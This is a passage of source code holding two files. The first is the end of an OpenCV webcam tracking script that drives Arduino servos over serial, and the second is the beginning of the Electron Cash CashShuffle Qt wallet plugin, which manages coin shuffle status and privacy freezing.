gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
height, width = gray.shape
if is_tracking:
new_points, status, error = cv2.calcOpticalFlowPyrLK(old_gray, gray, tracking_corners, None,
**lk_params)
tracking_corners = new_points
if tracking_corners.shape[0] < minimun_pts_track:
for i in range(-5, 5):
for j in range(-5, 5):
tracking_corners.append([track_x + i, track_y + j])
tracking_corners = np.array(tracking_corners).reshape(len(tracking_corners), 1, 2).astype('float32')
track_center = tracking_corners[:, 0, :].mean(axis=0).astype('int32')
#print(track_center)
# x, y = new_points.ravel()
cv2.circle(frame, (track_center[0], track_center[1]), 5, (0, 255, 0), -1)
#x = track_center[0]
#y = track_center[1]
pix_to_deg_v = height / fov_v
pix_to_deg_h = width / fov_h
error_x = (width / 2 + p_bias_h - p_e_h) - track_center[0]
error_y = (height / 2 + p_bias_v - p_e_v) - track_center[1]
error_in_deg_v = error_y / pix_to_deg_v
error_in_deg_h = error_x / pix_to_deg_h
#print(error_x,error_y)
if start_tracking:
tracking_corners = []
for i in range(-5, 5):
for j in range(-5, 5):
tracking_corners.append([track_x + i, track_y + j])
tracking_corners = np.array(tracking_corners).reshape(len(tracking_corners), 1, 2).astype('float32')
# print(tracking_corners)
start_tracking = False
is_tracking = True
cv2.line(frame, (width / 2, height / 2 - 10), (width / 2, height / 2 + 10), (0, 255, 0), 3)
cv2.line(frame, (width / 2 - 10, height / 2), (width / 2 + 10, height / 2), (0, 255, 0), 3)
old_gray = gray.copy()
cv2.imshow("viewer", frame)
cv2.waitKey(1)
def camera_thread():
global key, ra, dec, killFlag, error_in_deg_h, error_in_deg_v
global gray
global mouseX, mouseY
global update_tracker
dx = dy = 25
# mouseX, mouseY = -1, -1
# cap = cv2.VideoCapture(0)
#
# ret, frame = cap.read()
# gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# cv2.namedWindow('frame')
# cv2.imshow('frame', gray)
# cv2.setMouseCallback('frame', draw_circle)
# while (True):
# # Capture frame-by-frame
# ret, frame = cap.read()
#
# # Our operations on the frame come here
# gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# height, width = gray.shape
#
# pix_to_deg_v = height / fov_v
# pix_to_deg_h = width / fov_h
#
# # Display the resulting frame
# cv2.line(gray, (width / 4, height / 4 - 10), (width / 4, height / 4 + 10), (0, 255, 0), 3)
# cv2.line(gray, (width / 4 - 10, height / 4), (width / 4 + 10, height / 4), (0, 255, 0), 3)
#
# cv2.line(gray, (3 * width / 4, 3 * height / 4 - 10), (3 * width / 4, 3 * height / 4 + 10), (0, 255, 0), 3)
# cv2.line(gray, (3 * width / 4 - 10, 3 * height / 4), (3 * width / 4 + 10, 3 * height / 4), (0, 255, 0), 3)
#
# cv2.line(gray, (width / 4, 3 * height / 4 - 10), (width / 4, 3 * height / 4 + 10), (0, 255, 0), 3)
# cv2.line(gray, (width / 4 - 10, 3 * height / 4), (width / 4 + 10, 3 * height / 4), (0, 255, 0), 3)
#
# cv2.line(gray, (3 * width / 4, height / 4 - 10), (3 * width / 4, height / 4 + 10), (0, 255, 0), 3)
# cv2.line(gray, (3 * width / 4 - 10, height / 4), (3 * width / 4 + 10, height / 4), (0, 255, 0), 3)
#
# if mouseX > -1 and mouseY > -1:
# cv2.circle(gray, (mouseX, mouseY), 10, (0, 0, 0), thickness=3, lineType=8, shift=0)
#
# cv2.circle(gray, (width / 2, height / 2), 10, (22, 222, 22), thickness=3, lineType=8, shift=0)
#
# error_x = width / 2 - mouseX
# error_y = height / 2 - mouseY
#
# error_in_deg_v = error_y / pix_to_deg_v
# error_in_deg_h = error_x / pix_to_deg_h
#
# print (error_in_deg_h, error_in_deg_v)
# cv2.imshow('frame', gray)
#
# # print(cv2.waitKey(1))
#
# temp = 0
# lock.acquire()
# try:
# temp = ra
# finally:
# lock.release()
#
# key = cv2.waitKey(1)
# if key & 0xFF == ord('q'):
# print("breaking")
# break
# if key & 0xFF == ord('w'):
# temp = temp + 5
# print("ra(temp): {}".format(temp))
# if key & 0xFF == ord('s'):
# temp = temp - 5
# print("ra(temp): {}".format(temp))
#
# lock.acquire()
# try:
# ra = temp
# finally:
# lock.release()
#
# # When everything done, release the capture
# cap.release()
# cv2.destroyAllWindows()
# otherwise, for OpenCV 3.3 OR NEWER, we need to explicity call the
# initialize a dictionary that maps strings to their corresponding
# OpenCV object tracker implementations
OPENCV_OBJECT_TRACKERS = {
# "csrt": cv2.TrackerCSRT_create,
"kcf": cv2.TrackerKCF_create,
"boosting": cv2.TrackerBoosting_create,
"mil": cv2.TrackerMIL_create,
"tld": cv2.TrackerTLD_create,
"medianflow": cv2.TrackerMedianFlow_create,
# "mosse": cv2.TrackerMOSSE_create
}
# grab the appropriate object tracker using our dictionary of
# OpenCV object tracker objects
# tracker = OPENCV_OBJECT_TRACKERS[args["tracker"]]()
tracker = OPENCV_OBJECT_TRACKERS['medianflow']()
# initialize the bounding box coordinates of the object we are going
# to track
initBB = None
print("[INFO] starting video stream...")
vs = VideoStream(src=0).start()
time.sleep(1.0)
# initialize the FPS throughput estimator
fps = None
# loop over frames from the video stream
while True:
# grab the current frame, then handle if we are using a
# VideoStream or VideoCapture object
frame = vs.read()
# Our operations on the frame come here
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
height, width = gray.shape
# check to see if we have reached the end of the stream
if frame is None:
break
# resize the frame (so we can process it faster) and grab the
# frame dimensions
# frame = imutils.resize(frame, width=500)
(H, W) = frame.shape[:2]
# check to see if we are currently tracking an object
if initBB is not None:
# grab the new bounding box coordinates of the object
(success, box) = tracker.update(frame)
# check to see if the tracking was a success
if success:
(x, y, w, h) = [int(v) for v in box]
cv2.rectangle(frame, (x, y), (x + dx, y + dy),
(0, 255, 0), 2)
error_x = width / 2 - x
error_y = height / 2 - y
error_in_deg_v = error_y / pix_to_deg_v
error_in_deg_h = error_x / pix_to_deg_h
# print (error_in_deg_h, error_in_deg_v)
# update the FPS counter
fps.update()
fps.stop()
# initialize the set of information we'll be displaying on
# the frame
info = [
("Tracker", 'medianflow'),
("Success", "Yes" if success else "No"),
("FPS", "{:.2f}".format(fps.fps())),
]
# loop over the info tuples and draw them on our frame
for (i, (k, v)) in enumerate(info):
text = "{}: {}".format(k, v)
cv2.putText(frame, text, (10, H - ((i * 20) + 20)),
cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)
# check to see if we are currently tracking an object
pix_to_deg_v = height / fov_v
pix_to_deg_h = width / fov_h
# Display the resulting frame
cv2.line(gray, (width / 4, height / 4 - 10), (width / 4, height / 4 + 10), (0, 255, 0), 3)
cv2.line(gray, (width / 4 - 10, height / 4), (width / 4 + 10, height / 4), (0, 255, 0), 3)
cv2.line(gray, (3 * width / 4, 3 * height / 4 - 10), (3 * width / 4, 3 * height / 4 + 10), (0, 255, 0), 3)
cv2.line(gray, (3 * width / 4 - 10, 3 * height / 4), (3 * width / 4 + 10, 3 * height / 4), (0, 255, 0), 3)
cv2.line(gray, (width / 4, 3 * height / 4 - 10), (width / 4, 3 * height / 4 + 10), (0, 255, 0), 3)
cv2.line(gray, (width / 4 - 10, 3 * height / 4), (width / 4 + 10, 3 * height / 4), (0, 255, 0), 3)
cv2.line(gray, (3 * width / 4, height / 4 - 10), (3 * width / 4, height / 4 + 10), (0, 255, 0), 3)
cv2.line(gray, (3 * width / 4 - 10, height / 4), (3 * width / 4 + 10, height / 4), (0, 255, 0), 3)
if update_tracker and mouseX > -1 and mouseY > -1:
update_tracker = False
#frame = vs.read()
cv2.circle(frame, (mouseX, mouseY), 10, (0, 0, 0), thickness=3, lineType=8, shift=0)
cv2.rectangle(frame, (mouseX - dx, mouseY - dy), (mouseX + dx, mouseY + dy), (0, 0, 255), 2)
initBB = (mouseX - dx, mouseY - dy, mouseX + dx, mouseY + dy)
# print (initBB)
tracker = OPENCV_OBJECT_TRACKERS['medianflow']()
tracker.init(frame, initBB)
fps = FPS().start()
cv2.circle(frame, (width / 2, height / 2), 10, (22, 222, 22), thickness=3, lineType=8, shift=0)
# error_x = width / 2 - mouseX
# error_y = height / 2 - mouseY
# error_in_deg_v = error_y / pix_to_deg_v
# error_in_deg_h = error_x / pix_to_deg_h
# print (error_in_deg_h, error_in_deg_v)
# show the output frame
cv2.imshow("Frame", frame)
cv2.setMouseCallback("Frame", draw_circle)
key = cv2.waitKey(1) & 0xFF
# if the 's' key is selected, we are going to "select" a bounding
# box to track
if key == ord("s"):
# select the bounding box of the object we want to track (make
# sure you press ENTER or SPACE after selecting the ROI)
initBB = cv2.selectROI("Frame", frame, fromCenter=False,
showCrosshair=True)
# print (initBB)
# start OpenCV object tracker using the supplied bounding box
# coordinates, then start the FPS throughput estimator as well
tracker.init(frame, initBB)
fps = FPS().start()
# if the `q` key was pressed, break from the loop
elif key == ord("q"):
break
# if we are using a webcam, release the pointer
vs.stop()
# # otherwise, release the file pointer
# else:
# vs.release()
# close all windows
cv2.destroyAllWindows()
killFlag = True
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
def oculus_handle():
global key, ra, dec, error_in_deg_h, error_in_deg_v
yaw_lastStep = 0
pitch_lastStep = 0
roll_lastStep = 0
yaw_steps = 0
pitch_steps = 0
bufferLength = 2
yawVec = np.zeros(bufferLength)
pitchVec = np.zeros(bufferLength) + 127
raiseFlag = True
local_ra = 0
while killFlag is False:
# ss = ovrHmd_GetSensorState(hmd, ovr_GetTimeInSeconds())
# pose = ss.Predicted.Pose
# q = Quat([pose.Orientation.w, pose.Orientation.x, pose.Orientation.y,
# pose.Orientation.z]) # q.ra --> Pitch , q.dec --> Yaw , q.roll --> Roll
# print q.ra, q.dec, q.roll
# this part is true only for "pitch" of -90 to 90 degrees (The half dome infront of a person )
#tic = time.time()
lock.acquire()
dec = error_in_deg_h * 1.0
if dec > 45:
decLim = 45.0
raiseFlag = False
elif dec < -45:
raiseFlag = True
decLim = -45.0
else:
decLim = dec
steps_per_rev = 127
yaw_newStep = ((decLim / 180) * steps_per_rev)
yaw_lastStep = yaw_steps
yaw_steps = int(round(yaw_newStep))
yawVec[:-1]=yawVec[1:]
yawVec[-1] = yaw_steps
yaw_steps = np.mean(yawVec)
# lock.acquire()
try:
#error_in_deg_h = error_in_deg_h % 360
# local_ra = ra = error_in_deg_h*1.0
local_ra = ra = error_in_deg_v * 1.0
if local_ra > 23 and local_ra < 180:
raLim = 23.0
elif local_ra > 180 and local_ra < 338:
raLim = 338.0
else:
raLim = local_ra
#
# if local_ra < -23:
# ra = local_ra = -23
# raiseFlag = True
# if 23 < local_ra < 180:
# raLim = 23.0
# elif 180 < local_ra < 338:
#
# raLim = 338.0
# else:
# raLim = local_ra
finally:
lock.release()
if raLim <= 90 or raLim >= 270:
raLim = np.mod(raLim + 180, 360)
pitch_newStep = (((raLim) / 180) * steps_per_rev)
pitch_lastStep = pitch_steps
pitch_steps = int(round(pitch_newStep))
pitchVec[:-1]=pitchVec[1:]
pitchVec[-1] = pitch_steps
pitch_steps = np.mean(pitchVec)
#print(time.time() - tic)
# print ra,raLim,pitch_steps
#if yaw_steps != yaw_lastStep or pitch_steps != pitch_lastStep:
# print(dec, local_ra, yaw_steps, pitch_steps, raLim)
# ser.write(struct.pack(2*'B',yaw_steps + 128,pitch_steps + 128))
if serialExist:
ser.write(struct.pack('BBB', yaw_steps + 128, pitch_steps, 10))
#ser.write(struct.pack('BBB', 135, 135, 10))
# ser.write(struct.pack('BBB', yaw_steps + 128, 128, 10))
# ser.write(struct.pack('BBB', error_in_deg_h+128, error_in_deg_v, 10))
#print (error_in_deg_h,yaw_steps)
# ser.write(struct.pack('BBB', 64, pitch_steps, 10))
time.sleep(0.01)
if (serialExist):
recv = ser.read(1024).lstrip().rstrip()
if len(recv) > 0:
print(recv)
# dec = dec + 1s
# if raiseFlag:
# ra = ra + 5
# else:
# ra = ra - 5
#time.sleep(0.01)
if __name__ == '__main__':
# serialExist = False
if serialExist:
ser = serial.Serial(ArduinoCOM, baudrate=115200)
ser.timeout = 0.002
print("serial ==> " + str(ser.is_open))
time.sleep(1)
# start_new_thread(face_recognition_handle,())
# start_new_thread(cameras_handle,())
# start_new_thread(oculus_handle, ())
# start_new_thread(track_handle,())
logging.info("Main : before creating thread")
x = threading.Thread(target=oculus_handle, args=[])
#y = threading.Thread(target=camera_thread, args=[])
y = threading.Thread(target=camera_thread_better, args=[])
camera_thread
logging.info("Main : before running thread")
x.start()
y.start()
logging.info("Main : wait for the thread to finish")
x.join()
logging.info("Main : all done")
# while True:
# time.sleep(0.01)
|
qt.py
|
#!/usr/bin/env python3
#
# Cash Shuffle - CoinJoin for Bitcoin Cash
# Copyright (C) 2018-2019 Electron Cash LLC
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
import json
import copy
import socket
import time
import threading
import queue
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from electroncash.plugins import BasePlugin, hook
from electroncash.i18n import _
from electroncash.util import print_error, profiler, PrintError, Weak, format_satoshis_plain, finalization_print_error
from electroncash.network import Network
from electroncash.address import Address
from electroncash.bitcoin import COINBASE_MATURITY
from electroncash.transaction import Transaction
from electroncash.simple_config import SimpleConfig, get_config
from electroncash.wallet import Abstract_Wallet
from electroncash_gui.qt.util import EnterButton, CancelButton, Buttons, CloseButton, HelpLabel, OkButton, rate_limited, ColorScheme, destroyed_print_error, AppModalDialog
from electroncash_gui.qt.password_dialog import PasswordDialog
from electroncash_gui.qt.main_window import ElectrumWindow
from electroncash_gui.qt.amountedit import BTCAmountEdit
from electroncash_gui.qt.utils import FixedAspectRatioSvgWidget
from electroncash_plugins.shuffle.client import BackgroundShufflingThread, ERR_SERVER_CONNECT, ERR_BAD_SERVER_PREFIX, MSG_SERVER_OK
from electroncash_plugins.shuffle.comms import query_server_for_stats, verify_ssl_socket
from electroncash_plugins.shuffle.conf_keys import ConfKeys # config keys per wallet and global
from electroncash_plugins.shuffle.coin_utils import CoinUtils
def is_coin_busy_shuffling(window, utxo_or_name):
''' Convenience wrapper for BackgroundShufflingThread.is_coin_busy_shuffling '''
bp = getattr(window, 'background_process', None)
return bool(bp and bp.is_coin_busy_shuffling(utxo_or_name))
def network_callback(window, event, *args):
''' This gets called in the network thread. It should just emit signals to GUI
if it is to do any GUI work. '''
if event == 'new_transaction':
if len(args) == 2 and hasattr(window, 'wallet') and args[1] is window.wallet and args[0]:
window._shuffle_sigs.tx.emit(window, args[0])
def my_custom_item_setup(utxo_list, item, utxo, name):
if not hasattr(utxo_list.wallet, 'is_coin_shuffled'):
return
prog = utxo_list.in_progress.get(name, "")
frozenstring = item.data(0, Qt.UserRole+1) or ""
is_reshuffle = name in utxo_list.wallet._reshuffles
u_value = utxo['value']
if not is_reshuffle and utxo_list.wallet.is_coin_shuffled(utxo): # already shuffled
item.setText(5, _("Shuffled"))
elif not is_reshuffle and utxo['address'] in utxo_list.wallet._shuffled_address_cache: # we hit the cache directly as a performance hack. we don't really need a super-accurate reply as this is for UI and the cache will eventually be accurate
item.setText(5, _("Shuffled Addr"))
elif not prog and ("a" in frozenstring or "c" in frozenstring):
item.setText(5, _("Frozen"))
elif u_value >= BackgroundShufflingThread.UPPER_BOUND: # too big
item.setText(5, _("Too big"))
elif u_value < BackgroundShufflingThread.LOWER_BOUND: # too small
item.setText(5, _("Too small"))
elif utxo['height'] <= 0: # not_confirmed
if is_reshuffle:
item.setText(5, _("Unconfirmed (reshuf)"))
else:
item.setText(5, _("Unconfirmed"))
# for now we unconditionally disallow coinbase coins. See CashShuffle issue #64
# elif utxo['coinbase'] and (utxo['height'] + COINBASE_MATURITY > utxo_list.wallet.get_local_height()): # maturity check
# item.setText(5, _("Not mature"))
elif utxo['coinbase']: # we disallow coinbase coins
item.setText(5, _("Coinbase"))
elif (u_value >= BackgroundShufflingThread.LOWER_BOUND
and u_value < BackgroundShufflingThread.UPPER_BOUND): # queued_labels
window = utxo_list.parent
if (window and window.background_process and utxo_list.wallet.network
and utxo_list.wallet.network.is_connected()):
if window.background_process.get_paused():
item.setText(5, _("Paused"))
else:
if is_reshuffle:
item.setText(5, _("In queue (reshuf)"))
else:
item.setText(5, _("In queue"))
else:
item.setText(5, _("Offline"))
if prog == 'in progress': # in progress
item.setText(5, _("In progress"))
elif prog.startswith('phase '):
item.setText(5, _("Phase {}").format(prog.split()[-1]))
elif prog == 'wait for others': # wait for others
item.setText(5, _("Wait for others"))
elif prog.startswith("got players"): # got players > 1
num, tot = (int(x) for x in prog.rsplit(' ', 2)[-2:])
txt = "{} ({}/{})".format(_("Players"), num, tot)
item.setText(5, txt)
elif prog == "completed":
item.setText(5, _("Done"))
def my_custom_utxo_context_menu_setup(window, utxo_list, menu, selected):
''' Adds CashShuffle related actions to the utxo_list context (right-click)
menu '''
wallet = window.wallet
shuffled_selected = [name for name,flags in selected.items()
if (not flags
and wallet.is_coin_shuffled(CoinUtils.coin_name_to_dict(name))
and name not in wallet._reshuffles)]
reshuffles_selected = [name for name in selected if name in wallet._reshuffles]
menu.addSection(_('CashShuffle'))
def on_reshuffle():
wallet._reshuffles.update(set(shuffled_selected))
utxo_list.update()
def on_cancel_reshuffles():
wallet._reshuffles.difference_update(set(reshuffles_selected))
utxo_list.update()
len_shufs, len_reshufs = len(shuffled_selected), len(reshuffles_selected)
if len_shufs:
if len_shufs == 1:
action = menu.addAction(_('Reshuffle Coin'), on_reshuffle)
else:
action = menu.addAction(_('Reshuffle {} Shuffled').format(len_shufs), on_reshuffle)
if len_reshufs:
if len_reshufs == 1:
action = menu.addAction(_('Cancel Reshuffle'), on_cancel_reshuffles)
else:
action = menu.addAction(_('Cancel {} Reshuffles').format(len_reshufs), on_cancel_reshuffles)
def _make_label(window, tot, shufamt, chg, fee, scale):
is_dusty_fee = not chg and fee - BackgroundShufflingThread.FEE > 0
# satoshis -> display format
tot, shufamt, chg = window.format_amount(tot), window.format_amount(shufamt), window.format_amount(chg) if chg else ''
chgtxt = " + {} ".format(chg) if chg else " "
# Note it's important that the "Shuffle" prefix not be translated because we use it elsewhere
# in the filter shuffle history callback... and it's also a "proper name" :)
return ( "Shuffle" + (" {} {} {} {}{}(-{} sats {})"
.format(tot, window.base_unit(),
BackgroundShufflingThread.SCALE_ARROW_DICT.get(scale, BackgroundShufflingThread.SCALE_ARROW_UNKNOWN),
shufamt, chgtxt, fee, _("fee") if not is_dusty_fee else _("dusty fee")
)
)
)
def update_coin_status(window, coin_name, msg):
if getattr(window.utxo_list, "in_progress", None) is None:
return
#print_error("[shuffle] wallet={}; Coin {} Message '{}'".format(window.wallet.basename(), coin_name, msg.strip()))
prev_in_progress = window.utxo_list.in_progress.get(coin_name)
new_in_progress = prev_in_progress
msg = msg or '' # force str
coin_name = coin_name or '' # force str
if coin_name not in ("MAINLOG", "PROTOCOL"):
if msg.startswith("Player"):
if "get session number" in msg:
new_in_progress = 'wait for others'
elif 'joined the pool' in msg:
try:
num = int(msg.split(' ', 2)[1])
if num > 1:
# got more players than just self
new_in_progress = 'got players {} {}'.format(num, window.background_process.poolSize)
except (ValueError, IndexError):
pass
elif "begins CoinShuffle protocol" in msg:
new_in_progress = 'in progress'
elif "reaches phase" in msg:
pos = msg.find("reaches phase")
parts = msg[pos:].split(' ', 2)
try:
phase = int(parts[2])
new_in_progress = 'phase {}'.format(phase)
except (IndexError, ValueError):
pass
elif msg.endswith("complete protocol"):
new_in_progress = "completed" # NB: these don't leak. they eventually get cleaned up by the 'forget ' command from the background thread after some time
elif msg.startswith("Error"):
new_in_progress = None # flag to remove from progress list
if ERR_SERVER_CONNECT in msg or ERR_BAD_SERVER_PREFIX in msg:
window.cashshuffle_set_flag(1) # 1 means server connection issue
elif msg.startswith("Blame") and "insufficient" not in msg and "wrong hash" not in msg:
new_in_progress = None
elif msg.startswith("shuffle_txid:"): # TXID message -- call "set_label"
words = msg.split()
label = _("CashShuffle") # fallback on parse error
if len(words) >= 2:
txid = words[1]
try:
tot, shufamt, chg, fee, scale = [int(w) for w in words[2:7]] # parse satoshis
label = _make_label(window, tot, shufamt, chg, fee, scale)
except (IndexError, ValueError, TypeError) as e:
# Hmm. Some sort of parse error. We'll label it 'CashShuffle'
window.print_error("*** WARNING: Could not parse shuffle_txid message:", str(e), msg)
window.wallet.set_label(txid, label)
Plugin._increment_shuffle_counter(window)
window.update_wallet()
elif msg.startswith("add_tentative_shuffle:"):
# add_tentative_shuffle: utxo outaddr tot scale chg fee
# This is a mechanism as a workaround for issue #70 -- it's possible for last player to delay and cause other players to miss the txid.
try:
words = msg.split()
utxo, addr = words[1:3]
tot, shufamt, chg, fee, scale = [int(x) for x in words[3:8]] # parse satoshis
window._shuffle_tentative[utxo] = (addr, tot, shufamt, chg, fee, scale) # remember this tentative shuffle so we can generate a label for it if we see a matching tx come in later
except (IndexError, ValueError, TypeError) as e:
# Some sort of parse error...
window.print_error("*** WARNING: Could not parse add_tentative_shuffle message:", str(e), msg)
elif msg.startswith("del_tentative_shuffle:"):
try:
utxo = msg.split()[1]
window._shuffle_tentative.pop(utxo, None) # tolerate del commands for missing values from dict
except IndexError as e:
# Some sort of parse error...
window.print_error("*** WARNING: Could not parse del_tentative_shuffle message:", str(e), msg)
if not msg.startswith("Error") and not msg.startswith("Exit"):
window.cashshuffle_set_flag(0) # 0 means ok
elif new_in_progress != 'completed' and prev_in_progress == new_in_progress: # "Exit" or "Error"
# thread exit or error without completing protocol, set status back to 'in queue'
# -- fixes wrong status of 'in progress' and 'waiting for others' being shown in UI for dead threads
new_in_progress = None
else:
if msg == "stopped":
window.utxo_list.in_progress.clear(); new_in_progress = prev_in_progress = None
elif msg.startswith("forget "):
words = msg.strip().split()
prev_in_progress = 1; new_in_progress = None; coin_name = words[-1] # force the code below to pop the coin that we were asked to forget from the status dict
elif ERR_SERVER_CONNECT in msg:
new_in_progress = None # flag to remove from progress list
window.cashshuffle_set_flag(1) # 1 means server connection issue
elif MSG_SERVER_OK in msg:
new_in_progress = None
window.cashshuffle_set_flag(0) # server is ok now.
if prev_in_progress != new_in_progress:
if new_in_progress is None:
window.utxo_list.in_progress.pop(coin_name, None)
else:
window.utxo_list.in_progress[coin_name] = new_in_progress
window.utxo_list.update()
def _got_tx_check_tentative_shuffles(window, tx):
''' GUI thread: Got a new transaction for a window, so see if we should
apply the shuffle_tentative label to it. The below mechanism is a
workaround for bug #70. '''
t = getattr(window, '_shuffle_tentative', None)
if not t:
# Most of the time this code path is taken as the dict is usually empty.
# It only ever has entries when a shuffle failed at phase 4.
return
inputs, outputs = tx.inputs(), tx.outputs()
for utxo, info in t.copy().items():
# loop through all of the "tentative tx's" we have. this dict should be very small,
# it only contains entries for shuffles that timed out in phase 4 where last player took too long (bug #70)
addr, tot, amt, chg, fee, scale = info
for txin in inputs:
if CoinUtils.get_name(txin) == utxo:
# found the coin in the incoming tx. Now make sure it's our anticipated shuffle tx that failed and not some other tx, so we apply the correct label only when it's the phase-4-failed shuffle tx.
for n, txout in enumerate(outputs):
# Search the outputs of this tx to make sure they match what we expected for scale, out_addr...
typ, _addr, amount = txout
# the below checks make sure it matches what we expected from the failed shuffle, and also that the coin is shuffled (paranoia check).
if isinstance(_addr, Address) and amount == amt and _addr.to_storage_string() == addr:
txid = tx.txid()
if CoinUtils.is_coin_shuffled(window.wallet, {'prevout_hash':txid, 'prevout_n':n, 'address':_addr, 'value':amount}, {txid: tx}):
# all checks pass -- we successfully recovered from bug #70! Hurray!
window.wallet.set_label(txid, _make_label(window, tot, amt, chg, fee, scale))
Plugin._increment_shuffle_counter(window)
window.print_error("CashShuffle: found coin {} in tentative shuffle cache, applied label".format(utxo))
window.update_wallet()
else:
# hmm. this branch is very very unlikely.
window.print_error("CashShuffle: found coin {} in shuffle cache, but its tx is not a shuffle tx; label not applied".format(utxo))
break
else:
# This coin was spent in this tx, but it appears to not be the tx we anticipated.. Last player didn't broadcast and we spent it later (perhaps as a re-shuffle or other).
window.print_error("CashShuffle: removing spent coin {} from tentative shuffle cache, label not applied".format(utxo))
t.pop(utxo) # unconditionally remove this tentative coin from the dict since either way it's spent
return
def _got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc(window, tx):
''' Freeze address after spending from a shuffled coin address for privacy (issue #100).
Also remove any shuffled coin spends from the _is_shuffled_cache. '''
inputs = tx.inputs()
addrs_to_freeze = set()
coins_to_purge_from_shuffle_cache = list()
coins_to_purge_from_reshuffles = set()
wallet = window.wallet
all_addresses = None
def is_mine(a):
''' This is faster than calling wallet.is_mine on *each* input
as that involves a lot of rebuilding of the addresses list for each call.
Also we use a set here which is faster than O(n) list lookup.
This matters on huge tx's with many inputs as a speedup.'''
nonlocal all_addresses
if all_addresses is None:
all_addresses = set(wallet.get_addresses())
return a in all_addresses
for inp in inputs:
addr = inp['address']
if isinstance(addr, Address) and is_mine(addr):
# This coin was ours, purge True/False results from the
# _is_shuffled_cache for this coin.
name = CoinUtils.get_name(inp)
coins_to_purge_from_shuffle_cache.append(name)
coins_to_purge_from_reshuffles.add(name)
if addr not in addrs_to_freeze and wallet.is_coin_shuffled(inp):
# We spent a shuffled coin belonging to us.
# Freeze that address to protect privacy.
addrs_to_freeze.add(addr)
if addrs_to_freeze:
change_addr_set = set(wallet.get_change_addresses())
addrs_to_freeze2 = addrs_to_freeze & change_addr_set # we *ONLY* freeze if change address. see #1291
if addrs_to_freeze2:
wallet.set_frozen_state(addrs_to_freeze2, True)
for addr in addrs_to_freeze2:
name = addr.to_storage_string()
if not wallet.labels.get(name): # only put a label in there if no label there already
wallet.set_label(name, _("Shuffled coin spent (frozen for privacy)"))
# the below is to prevent the "is_shuffled_cache" from growing forever which
# impacts performance and wastes memory. Since we were checking a seen TX
# anyway, might as well expire coins from the cache that were spent.
# remove_from_shufflecache acquires locks as it operates on the cache.
CoinUtils.remove_from_shufflecache(wallet, coins_to_purge_from_shuffle_cache)
# "forget" that these addresses were designated as shuffled addresses.
CoinUtils.remove_from_shuffled_address_cache(wallet, addrs_to_freeze)
wallet._reshuffles.difference_update(coins_to_purge_from_reshuffles)
def _got_tx(window, tx):
''' Generic callback to monitor tx's received for a wallet. Note that
if this is called the tx definitely is for this window/wallet. '''
if not hasattr(window, '_shuffle_patched_'):
# defensie programming in case this signal arrives late
# just as the user was disabling cash shuffle
# (signal arrives via QueuedConnection which is why this check is necessary)
return
_got_tx_check_tentative_shuffles(window, tx) # check for workaround to bug#70
_got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc(window, tx) # Feature #100
# Note at this point the is_shuffled cache has had entries for inputs in
# the tx above removed. If you want to add checks to this function that
# involve the _is_shuffled_cache, do it above before the
# '_got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc' call.
class MsgForwarder(QObject):
''' Forwards messages from BackgroundShufflingThread to the GUI thread using
Qt signal magic. See function update_coin_status above. '''
gotMessage = pyqtSignal(str, str)
def __init__(self, window):
super().__init__(None)
self.window = window
self.gotMessage.connect(self.gotMsgSlot)
def send(self, msg, sender):
self.gotMessage.emit(msg, sender)
def gotMsgSlot(self, msg, sender):
update_coin_status(self.window, sender, msg)
def disconnectAll(self):
try:
self.gotMessage.disconnect()
except:
pass
def start_background_shuffling(window, network_settings, period = 10.0, password = None, timeout = 60.0):
logger = MsgForwarder(window)
window.background_process = BackgroundShufflingThread(window,
window.wallet,
network_settings,
logger = logger,
period = period,
password = password,
timeout = timeout)
window.background_process.start()
def monkey_patches_apply(window):
def patch_window(window):
if getattr(window, '_shuffle_patched_', None):
return
window.background_process = None
window.send_tab_shuffle_extra = SendTabExtra(window)
window._shuffle_tentative = dict()
class Sigs(QObject):
tx = pyqtSignal(QObject, object)
window._shuffle_sigs = sigs = Sigs(window)
sigs.tx.connect(_got_tx)
window._shuffle_network_callback = lambda event, *args: network_callback(window, event, *args)
if window.network:
window.network.register_callback(window._shuffle_network_callback, ['new_transaction'])
window._shuffle_patched_ = True
window.force_use_single_change_addr = _("CashShuffle is enabled: change address logic will be handled by CashShuffle (to preserve privacy).")
print_error("[shuffle] Patched window")
def patch_utxo_list(utxo_list):
if getattr(utxo_list, '_shuffle_patched_', None):
return
header = utxo_list.headerItem()
header_labels = [header.text(i) for i in range(header.columnCount())]
header_labels.append(_("Shuffle status"))
utxo_list.update_headers(header_labels)
utxo_list.in_progress = dict()
utxo_list._shuffle_patched_ = True
print_error("[shuffle] Patched utxo_list")
def patch_wallet(wallet):
if getattr(wallet, '_shuffle_patched_', None):
return
wallet.is_coin_shuffled = lambda coin, txs=None: CoinUtils.is_coin_shuffled(wallet, coin, txs)
wallet.get_shuffled_and_unshuffled_coins = lambda *args, **kwargs: CoinUtils.get_shuffled_and_unshuffled_coins(wallet, *args, **kwargs)
